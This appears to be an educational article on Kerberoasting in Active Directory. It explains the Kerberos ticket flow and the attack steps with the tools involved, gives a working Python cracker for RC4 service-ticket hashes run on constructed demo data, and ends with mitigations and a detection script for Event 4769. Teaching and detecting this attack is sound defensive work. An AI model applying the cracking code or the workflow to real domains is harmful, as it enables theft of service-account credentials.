Status: Decrypted / 9/6/2025

Deep Dive: Kerberoasting Attacks

Understanding Kerberos and Kerberoasting

Introduction

Kerberos is the backbone of authentication in Active Directory environments. The protocol itself is robust, but one of its design choices can be abused: any authenticated user can obtain a service ticket encrypted with the target service account's key. Kerberoasting exploits this to collect such tickets and crack the underlying service account passwords offline. Understanding the full attack chain is critical for securing an AD environment.


1️⃣ Quick Recap of Kerberos

Kerberos relies on a Key Distribution Center (KDC), hosted on every domain controller, which issues two kinds of tickets:

  • Ticket Granting Ticket (TGT): proves the user is authenticated to the domain; it is encrypted with the key of the krbtgt account, so only the KDC can read it.
  • Service ticket (commonly called a TGS ticket, after the Ticket Granting Service that issues it): grants access to one specific service and is encrypted with the key of the account that runs that service.

Typical authentication flow:

  1. The user authenticates to the KDC (AS-REQ/AS-REP) and receives a TGT. The TGT itself is encrypted with the krbtgt key; the session key that accompanies it is encrypted with the user's own key, derived from their password, which is what proves the user knows it.
  2. To access a service, the user sends the TGT to the KDC in a TGS-REQ naming the service's SPN; the KDC answers (TGS-REP) with a service ticket encrypted with the service account's key.
  3. The user presents the service ticket to the service (AP-REQ). The service decrypts it with its own key, checks validity and the embedded PAC, and grants access.

2️⃣ Kerberoasting Explained in Depth

Principle

Any authenticated Active Directory user can request a service ticket for any registered SPN. The KDC does not check whether the requester is actually allowed to use that service; authorization is enforced by the service itself. The KDC merely embeds the requester's security information (group membership, via the PAC) in the ticket.

This means an attacker can request service tickets for arbitrary SPNs. If an SPN is registered in AD, the KDC returns a ticket whose encrypted part is protected with a key derived from the service account's password. With RC4-HMAC (encryption type 23) that key is simply the account's NT hash, so the attacker holds a ciphertext, knows the algorithm, and can test candidate passwords offline with no further interaction with the domain.

The Step-by-Step Attack Process

Step 1: Reconnaissance and Targeting

The attacker queries Active Directory for accounts that have a Service Principal Name (SPN) registered. Computer accounts carry SPNs too, but their passwords are long and random; the worthwhile targets are user accounts with an SPN (SQL, Exchange, web services, etc.), whose passwords were chosen by a human and are often never rotated. Disabled accounts and krbtgt are filtered out.

  • Tools: ldapsearch, setspn -Q */*, PowerShell Get-ADUser filtered on servicePrincipalName, Impacket's GetUserSPNs.py, Rubeus kerberoast.

Step 2: Requesting Service Tickets

The attacker requests a service ticket (TGS-REQ) for each targeted SPN, which any domain user is allowed to do. The KDC responds with a ticket encrypted with the service account's key. Attack tools ask for RC4-HMAC (encryption type 23) in the request; unless the account is restricted to AES, the KDC obliges, and with RC4 the key is the account's NT hash, the cheapest type to crack. Each request is logged on the domain controller as Event ID 4769.

Step 3: Exporting Tickets

The attacker extracts the encrypted part of each ticket and writes it in a cracker format: Rubeus and Impacket output hashcat's $krb5tgs$ lines directly, while Mimikatz exports .kirbi files that are converted afterwards. From this point the attack is entirely offline: the domain sees nothing further, and the only trace it ever had is the service ticket requests of Step 2.

Step 4: Offline Cracking

The attacker runs dictionary, rule-based or brute-force attacks on the extracted material, e.g. with Hashcat (mode 13100 for RC4 tickets, 19600 and 19700 for AES-128 and AES-256) or John the Ripper (krb5tgs format). For an RC4 ticket each guess costs one NT hash computation plus a few HMAC-MD5 and RC4 operations, which is why a dictionary word with a year and a symbol falls in minutes; AES tickets require a PBKDF2 key derivation per guess and are orders of magnitude slower.
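The whole chain of Steps 2 to 4, as an added example that is not part of the original article: a Python script that plays the KDC (encrypting a constructed ticket body under the service account's NT hash with RC4-HMAC, RFC 4757), writes the result in hashcat's $krb5tgs$23$ line format, and then cracks it with a small wordlist the way hashcat mode 13100 does. The account, realm, SPN, password, wordlist and ticket body are all constructed for the demo; MD4 is implemented by hand because Python's hashlib frequently ships without it.

```python
"""Offline core of Kerberoasting for RC4-HMAC (etype 23) tickets, end to end.
Plays the KDC (ticket enc-part encrypted under the service account's NT hash,
RFC 4757), exports hashcat's $krb5tgs$23$ line, then cracks it the way hashcat
mode 13100 does. All names, passwords and the ticket body are constructed."""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
KEY_USAGE_TICKET = 2  # RFC 4120 key usage for the Ticket enc-part of an AS/TGS-REP


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib often lacks it."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = [  # (boolean function, additive constant, message word order, shifts)
        (lambda x, y, z: (x & y) | (~x & z), 0, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    ]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = _rol((a + fn(b, c, d) + x[idx] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is the NT hash: MD4 of the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le"))


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757: K1 = HMAC(K, usage); checksum = HMAC(K1, conf||pt);
    K3 = HMAC(K1, checksum); output = checksum || RC4(K3, conf||pt)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)


def kdc_issue_ticket(user, realm, spn, service_password, enc_ticket_part, confounder=None):
    """Steps 2-3 seen from the attacker: the KDC encrypts the ticket under the service
    account's key; the tool writes it as a hashcat line (16-byte checksum, then ciphertext)."""
    blob = rc4_hmac_encrypt(nt_hash(service_password), KEY_USAGE_TICKET,
                            enc_ticket_part, confounder or os.urandom(8))
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def crack_krb5tgs(hash_line, wordlist):
    """Step 4: per candidate one MD4 plus three HMAC-MD5 and one RC4, entirely offline.
    A candidate is right when the checksum recomputed over the decrypted data matches."""
    _, checksum_hex, cipher_hex = hash_line.rsplit("$", 2)
    checksum, ciphertext = bytes.fromhex(checksum_hex), bytes.fromhex(cipher_hex)
    for candidate in wordlist:
        k1 = _hmac_md5(nt_hash(candidate), struct.pack("<I", KEY_USAGE_TICKET))
        data = rc4(_hmac_md5(k1, checksum), ciphertext)
        if hmac.compare_digest(_hmac_md5(k1, data), checksum):
            return candidate
    return None


# Constructed demo: a user account running SQL Server with a human-chosen password.
DEMO_TICKET = kdc_issue_ticket("mallory", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433",
                               "Summer2024!", b"\x63" + b"constructed EncTicketPart body")
DEMO_WORDLIST = ["Password1", "Welcome123", "Summer2024!", "sql_admin"]

if __name__ == "__main__":
    print(DEMO_TICKET)
    print("cracked:", crack_krb5tgs(DEMO_TICKET, DEMO_WORDLIST))
```

Each candidate costs one MD4 and a handful of HMAC-MD5 and RC4 operations, which is why RC4 tickets crack so quickly on a GPU. Had the KDC issued an AES ticket instead, the nt_hash step would become a PBKDF2 derivation of thousands of iterations per guess, and the ticket would carry a salt tied to the realm and account name, which is exactly the cost the AES-only mitigation buys.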


3️⃣ Advanced Mitigations

To reduce Kerberoasting risk:

  1. Strong Passwords: use long (25+ characters), random, unique passwords for any user account that carries an SPN, and rotate them. Offline cracking is only as fast as the password is weak.
  2. gMSA: use Group Managed Service Accounts (gMSA) wherever the service supports them; Windows generates a 240-byte random password and rotates it automatically (every 30 days by default), which puts cracking out of reach.
  3. Least Privilege: never grant Domain Admin or other high privileges to service accounts, so that a cracked password does not hand over the domain.
  4. AES only: set msDS-SupportedEncryptionTypes on service accounts (and ideally domain-wide) so that RC4 tickets are no longer issued; AES keys are derived with PBKDF2 and are far slower to crack, and any remaining RC4 request then stands out.
  5. Monitoring: on domain controllers, alert on Event ID 4769 when one account requests service tickets for many distinct SPNs within a short window, and on any 4769 with TicketEncryptionType 0x17 (RC4) once AES is enforced. Exclude computer accounts and krbtgt as targets to keep the signal clean.
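A concrete version of the monitoring rule, as an added example that is not from the original article: the records below are constructed Security event 4769 fields (requester, target service account, encryption type, source IP), not real logs, and the window and threshold are assumptions to tune per environment. The script flags a requester that asks for many distinct user-account SPNs inside a window (the spray pattern of Steps 1 to 2) and, separately, lists every RC4 request for a crackable account, which catches a low-and-slow attacker once AES is the norm.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security event 4769 records (not real logs); field names follow the
# event's own: TargetUserName = requester, ServiceName = account owning the SPN.
SAMPLE_4769 = [
    # (TimeCreated, TargetUserName, ServiceName, TicketEncryptionType, IpAddress)
    ("2025-09-06T08:00:01", "alice@CORP.LOCAL", "WS01$", "0x12", "10.0.0.5"),
    ("2025-09-06T08:00:02", "alice@CORP.LOCAL", "svc_sql", "0x12", "10.0.0.5"),
    ("2025-09-06T08:15:00", "mallory@CORP.LOCAL", "svc_sql", "0x17", "10.0.0.77"),
    ("2025-09-06T08:15:00", "mallory@CORP.LOCAL", "svc_backup", "0x17", "10.0.0.77"),
    ("2025-09-06T08:15:01", "mallory@CORP.LOCAL", "svc_web", "0x17", "10.0.0.77"),
    ("2025-09-06T08:15:01", "mallory@CORP.LOCAL", "svc_exchange", "0x17", "10.0.0.77"),
    ("2025-09-06T08:15:02", "mallory@CORP.LOCAL", "svc_sharepoint", "0x17", "10.0.0.77"),
    ("2025-09-06T08:15:02", "mallory@CORP.LOCAL", "FS01$", "0x17", "10.0.0.77"),
    ("2025-09-06T08:15:03", "mallory@CORP.LOCAL", "krbtgt", "0x12", "10.0.0.77"),
    ("2025-09-06T09:00:00", "bob@CORP.LOCAL", "svc_sql", "0x17", "10.0.0.9"),
]

RC4_HMAC = "0x17"              # TicketEncryptionType value for RC4-HMAC (etype 23)
WINDOW = timedelta(minutes=5)  # assumption: tune to the environment
THRESHOLD = 4                  # distinct crackable SPNs per requester inside WINDOW


def is_crackable_target(service_name: str) -> bool:
    """Only user accounts with an SPN are worth cracking: computer accounts ($) have
    random passwords, and krbtgt requests are TGT renewals, not Kerberoasting."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def _requests_by_user(events):
    by_user = defaultdict(list)
    for ts, user, svc, etype, ip in events:
        if is_crackable_target(svc):
            by_user[user].append((datetime.fromisoformat(ts), svc, etype, ip))
    for reqs in by_user.values():
        reqs.sort()
    return by_user


def detect_spray(events, window=WINDOW, threshold=THRESHOLD):
    """Sliding window per requester: one alert when >= threshold distinct SPNs are hit."""
    alerts = []
    for user, reqs in _requests_by_user(events).items():
        for i, (t0, _, _, ip) in enumerate(reqs):
            hits = [r for r in reqs[i:] if r[0] - t0 <= window]
            spns = {r[1] for r in hits}
            if len(spns) >= threshold:
                rc4 = sum(1 for r in hits if r[2] == RC4_HMAC)
                alerts.append({"user": user, "source_ip": ip, "start": t0.isoformat(),
                               "distinct_spns": sorted(spns), "rc4_requests": rc4,
                               "severity": "high" if rc4 else "medium"})
                break  # one alert per requester is enough for triage
    return alerts


def rc4_requests(events):
    """Low-and-slow variant: once AES is enforced, any RC4 ticket for a crackable
    account is suspicious on its own, whatever the volume."""
    return [(ts, user, svc, ip) for ts, user, svc, etype, ip in events
            if etype == RC4_HMAC and is_crackable_target(svc)]


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_4769):
        print("SPRAY", alert)
    for hit in rc4_requests(SAMPLE_4769):
        print("RC4  ", hit)
```

In production the tuples would come from the domain controllers' Security log (Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} or a SIEM feed); the rule logic stays the same. The spray rule deliberately ignores WS01$ and FS01$ so that ordinary workstation-to-file-server traffic does not inflate the count, and bob's single legacy RC4 request only surfaces through the second, lower-volume rule.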
